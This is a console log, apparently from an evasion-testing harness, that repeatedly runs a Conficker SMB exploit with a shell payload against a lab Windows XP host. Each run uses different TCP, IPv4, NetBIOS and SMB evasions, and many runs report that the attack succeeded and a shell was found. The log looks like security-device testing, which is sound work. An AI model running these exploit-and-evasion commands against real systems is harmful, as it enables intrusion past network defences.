- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60127 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=C5hrHohMDyM --evasion=[smb_connect,end]netbios_chaff,"21","empty_unspec|empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed C5hrHohMDyM
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 25% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_connect to end:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.114:60127 -> 10.35.1.207:445
- Terminated
- ......
- 2859 runs averaging 2.07 runs / second ; progress: 1379/43200.............2015-06-07 23:42:33 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30054 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=6kx/4FvdT9w --evasion=[smb_connect,msrpc_req]tcp_paws,"1","3","alphanumrandomized" --evasion=[smb_connect,end]tcp_tsoptreply,"le" --evasion=[smb_opentree,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed 6kx/4FvdT9z
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.118:30054 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- 2873 runs averaging 2.08 runs / second ; progress: 1384/43200............2015-06-07 23:42:38 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54781 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=O41JLQdTNUg --evasion=[netbios_connect,smb_connect]netbios_chaff,"13","empty_keepalive|http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_paws,"5","264106485","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed O41JLQdTNUg
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 264106485> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:54781 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 2888 runs averaging 2.08 runs / second ; progress: 1389/43200.........
- 2897 runs averaging 2.08 runs / second ; progress: 1394/43200.....
- 2902 runs averaging 2.07 runs / second ; progress: 1399/432002015-06-07 23:42:49 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56654 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=wpR2aE+gKxE --evasion=[smb_connect,end]smb_decoytrees,"6","1","8","random_msrpcreq" --evasion=[netbios_connect,smb_opentree]tcp_urgent,"3","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed wpR2aE+gKxH
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Add a zero urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 6 SMB trees are opened and 1 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.114:56654 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .......
- 2910 runs averaging 2.07 runs / second ; progress: 1404/43200..........
- 2920 runs averaging 2.07 runs / second ; progress: 1409/43200.....
- 2925 runs averaging 2.07 runs / second ; progress: 1414/432002015-06-07 23:43:04 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37265 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=B3brkhsbOQY --evasion=[start,smb_connect]ipv4_opt,"3","inc","alphanumrandomized" --evasion=[start,end]tcp_paws,"50%","161438852","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed B3brkhsbOQY
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161438852> and has shuffled original payload
- The following evasions are applied from stage start to smb_connect:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphanumeric characters are randomized
- Info: NetBIOS connection 10.62.90.111:37265 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 2934 runs averaging 2.07 runs / second ; progress: 1419/43200.....
- 2939 runs averaging 2.06 runs / second ; progress: 1424/43200....
- 2943 runs averaging 2.06 runs / second ; progress: 1429/43200...
- 2946 runs averaging 2.05 runs / second ; progress: 1434/43200......
- 2952 runs averaging 2.05 runs / second ; progress: 1439/43200.....
- 2957 runs averaging 2.05 runs / second ; progress: 1444/43200.....
- 2962 runs averaging 2.04 runs / second ; progress: 1449/43200..
- 2964 runs averaging 2.04 runs / second ; progress: 1454/43200
- 2964 runs averaging 2.03 runs / second ; progress: 1459/43200
- 2964 runs averaging 2.02 runs / second ; progress: 1464/43200...Pid 16867 timed out - killed
- 2015-06-07 23:43:56 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=32831 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fbiRe0OqRqE --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"1480","new","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed fbiRe0OqRqF
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - TCP segments are set to overlap by 1480 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_openpipe to end:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.115:32831 -> 10.35.1.207:445
- Terminated
- ...Pid 16964 timed out - killed
- 2015-06-07 23:43:58 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55313 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=b5STQXcaaZU --evasion=[start,smb_opentree]ipv4_opt,"2","inc","random_alphanum" --evasion=[smb_connect,msrpc_bind]netbios_chaff,"8","empty_unspec|http_post|msrpc_req" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed b5STQXcaaZV
- The following evasions are applied from stage start to smb_opentree:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:55313 -> 10.35.1.207:445
- Terminated
- ....
- 2976 runs averaging 2.03 runs / second ; progress: 1469/43200........
- 2984 runs averaging 2.02 runs / second ; progress: 1474/43200......
- 2990 runs averaging 2.02 runs / second ; progress: 1479/43200
- 2990 runs averaging 2.01 runs / second ; progress: 1484/43200.....2015-06-07 23:44:17 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61219 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=st6VvQtY2WU --evasion=[netbios_connect,end]netbios_chaff,"50%","small_unspec" --evasion=[smb_connect,msrpc_req]tcp_paws,"2","183712702","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"13","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed st6VvQtY2WW
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is a small NetBIOS message of an unspecified type.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 183712702> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Add a random alphaurgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.115:61219 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....
- 3000 runs averaging 2.01 runs / second ; progress: 1489/43200..
- 3002 runs averaging 2.01 runs / second ; progress: 1494/43200.....
- 3007 runs averaging 2.01 runs / second ; progress: 1499/43200.....
- 3012 runs averaging 2.00 runs / second ; progress: 1504/43200..........
- 3022 runs averaging 2.00 runs / second ; progress: 1509/43200....
- 3026 runs averaging 2.00 runs / second ; progress: 1514/43200Pid 17706 timed out - killed
- 2015-06-07 23:44:48 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50332 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=baHVccOAqg0 --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"2","empty_unspec|http_get|http_post|broken_length" --evasion=[smb_openpipe,end]tcp_urgent,"1","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed baHVccOAqg1
- The following evasions are applied from stage smb_openpipe to end:
- - Add a zero urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:50332 -> 10.35.1.207:445
- Terminated
- .
- 3028 runs averaging 1.99 runs / second ; progress: 1519/43200.......
- 3035 runs averaging 1.99 runs / second ; progress: 1524/43200.......2015-06-07 23:44:57 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20874 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bDJ7YWEAIoE --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"2","inc","random_alpha" --evasion=[netbios_connect,msrpc_req]tcp_paws,"1","5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bDJ7YWEAIoF
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.112:20874 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ....
- 3047 runs averaging 1.99 runs / second ; progress: 1529/43200.........
- 3056 runs averaging 1.99 runs / second ; progress: 1534/43200......
- 3062 runs averaging 1.99 runs / second ; progress: 1539/43200....
- 3066 runs averaging 1.99 runs / second ; progress: 1544/43200..Pid 18133 timed out - killed
- 2015-06-07 23:45:15 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=gZv/c+PGmls --evasion=[msrpc_bind,end]smb_decoytrees,"2","6","900","random" --evasion=[netbios_connect,end]tcp_paws,"8","5","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed gZv/c+PGmlu
- The following evasions are applied from stage netbios_connect to end:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 2 SMB trees are opened and 6 writes are performed to them. The write payload is 900 random bytes.
- Info: NetBIOS connection 10.62.90.117:55741 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Terminated
- .......2015-06-07 23:45:19 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18357 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=HyiGiu1DZEU --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"7","1","6","random_msrpcbind" --evasion=[msrpc_bind,msrpc_req]smb_seg,"7" --verifydelay=1000 --payload=shell
- Info: Using random seed HyiGiu1DZEU
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 1 writes are performed to them. The write payload is 6 bytes of MSRPC bind-like data.
- - SMB writes are segmented to contain at most 7 bytes of payload.
- Info: NetBIOS connection 10.62.90.115:18357 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .
- 3078 runs averaging 1.99 runs / second ; progress: 1549/43200.
- 3079 runs averaging 1.98 runs / second ; progress: 1554/43200....
- 3083 runs averaging 1.98 runs / second ; progress: 1559/43200..........
- 3093 runs averaging 1.98 runs / second ; progress: 1564/43200......2015-06-07 23:45:39 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41890 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=pFzCeVGUS4A --evasion=[start,netbios_connect]ipv4_frag,"1128" --evasion=[msrpc_bind,end]smb_decoytrees,"3","3","7","random_msrpcbind" --evasion=[smb_connect,end]tcp_overlap,"5","new","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed pFzCeVGUS4C
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 1128 bytes per fragment
- The following evasions are applied from stage smb_connect to end:
- - TCP segments are set to overlap by 5 bytes, with the later packet containing the correct payload. Overlapping part has 0x00 bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 3 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.115:41890 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 3100 runs averaging 1.98 runs / second ; progress: 1569/43200
- 3100 runs averaging 1.97 runs / second ; progress: 1574/43200..
- 3102 runs averaging 1.96 runs / second ; progress: 1579/43200.........
- 3111 runs averaging 1.96 runs / second ; progress: 1584/43200........
- 3119 runs averaging 1.96 runs / second ; progress: 1589/43200.......
- 3126 runs averaging 1.96 runs / second ; progress: 1594/43200.......
- 3133 runs averaging 1.96 runs / second ; progress: 1599/43200.....
- 3138 runs averaging 1.96 runs / second ; progress: 1604/43200.....
- 3143 runs averaging 1.95 runs / second ; progress: 1609/43200..........
- 3153 runs averaging 1.95 runs / second ; progress: 1614/43200..2015-06-07 23:46:25 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57851 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=AP1hGMDxKw4 --evasion=[netbios_connect,msrpc_req]ipv4_opt,"5","inc","shuffletcp" --evasion=[netbios_connect,end]tcp_paws,"3","137668711","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed AP1hGMDxKw4
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - Every 5th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 137668711> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.113:57851 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....Pid 19636 timed out - killed
- 2015-06-07 23:46:28 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50808 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=Jkvm51PzYao --evasion=[smb_opentree,end]ipv4_frag,"1480" --evasion=[netbios_connect,end]ipv4_opt,"13","inc","zero" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Jkvm51PzYao
- The following evasions are applied from stage netbios_connect to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has NULL bytes for payload
- The following evasions are applied from stage smb_opentree to end:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.110:50808 -> 10.35.1.207:445
- Terminated
- ..........
- 3172 runs averaging 1.96 runs / second ; progress: 1619/43200...............
- 3187 runs averaging 1.96 runs / second ; progress: 1625/43200...............
- 3202 runs averaging 1.96 runs / second ; progress: 1630/432002015-06-07 23:46:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42667 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=GOpIKjE2r4Y --evasion=[msrpc_bind,end]smb_decoytrees,"3","6","7","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_segvar,"4","65535" --verifydelay=1000 --payload=shell
- Info: Using random seed GOpIKjE2r4Y
- The following evasions are applied from stage msrpc_bind to end:
- - TCP packets are segmented to contain between 4 and 65535 bytes of payload.
- - Before normal SMB writes, 3 SMB trees are opened and 6 writes are performed to them. The write payload is 7 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.115:42667 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 3212 runs averaging 1.96 runs / second ; progress: 1635/43200........
- 3220 runs averaging 1.96 runs / second ; progress: 1640/43200.............
- 3233 runs averaging 1.97 runs / second ; progress: 1645/43200............2015-06-07 23:46:59 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30995 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=eLhPcn+y9o4 --evasion=[start,end]tcp_paws,"21","122513006","shuffle30" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed eLhPcn+y9o5
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122513006> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:30995 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 3248 runs averaging 1.97 runs / second ; progress: 1650/43200..............
- 3262 runs averaging 1.97 runs / second ; progress: 1655/43200..............
- 3276 runs averaging 1.97 runs / second ; progress: 1660/43200...........
- 3287 runs averaging 1.97 runs / second ; progress: 1665/43200.......
- 3294 runs averaging 1.97 runs / second ; progress: 1670/43200...
- 3297 runs averaging 1.97 runs / second ; progress: 1675/43200.......
- 3304 runs averaging 1.97 runs / second ; progress: 1680/43200........
- 3312 runs averaging 1.97 runs / second ; progress: 1685/43200.....Pid 21182 timed out - killed
- 2015-06-07 23:47:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18119 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=nYRQiekFQ6c --evasion=[msrpc_bind,end]ipv4_opt,"75%","inc","zero" --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|small_unspec|http_get|http_post|msrpc_req" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nYRQiekFQ6e
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has NULL bytes for payload
- Info: NetBIOS connection 10.62.90.118:18119 -> 10.35.1.207:445
- Terminated
- ..
- 3320 runs averaging 1.96 runs / second ; progress: 1690/43200Pid 21258 timed out - killed
- 2015-06-07 23:47:40 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44993 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=117gBcdU3HQ --evasion=[msrpc_bind,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 117gBcdU3HT
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - The SMB filename is obfuscated:
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.116:44993 -> 10.35.1.207:445
- Terminated
- .......2015-06-07 23:47:44 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39878 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=EQRt84k6lTQ --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"2","1","10","random_msrpcreq" --evasion=[smb_connect,end]smb_decoytrees,"2","2","8","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed EQRt84k6lTQ
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 10 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.115:39878 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 3330 runs averaging 1.96 runs / second ; progress: 1695/43200.........
- 3339 runs averaging 1.96 runs / second ; progress: 1700/43200..........
- 3349 runs averaging 1.96 runs / second ; progress: 1705/43200..........
- 3359 runs averaging 1.96 runs / second ; progress: 1710/43200Pid 21568 timed out - killed
- 2015-06-07 23:48:00 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35574 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b1eDRHpOWxU --evasion=[smb_opentree,msrpc_req]smb_chaff,"25%","write_flag","zero" --evasion=[start,msrpc_req]tcp_paws,"75%","3","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed b1eDRHpOWxV
- The following evasions are applied from stage start to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
- Info: NetBIOS connection 10.62.90.119:35574 -> 10.35.1.207:445
- Terminated
- ......
- 3366 runs averaging 1.96 runs / second ; progress: 1715/43200.2015-06-07 23:48:06 INFO
- Success. (10.62.90.119):
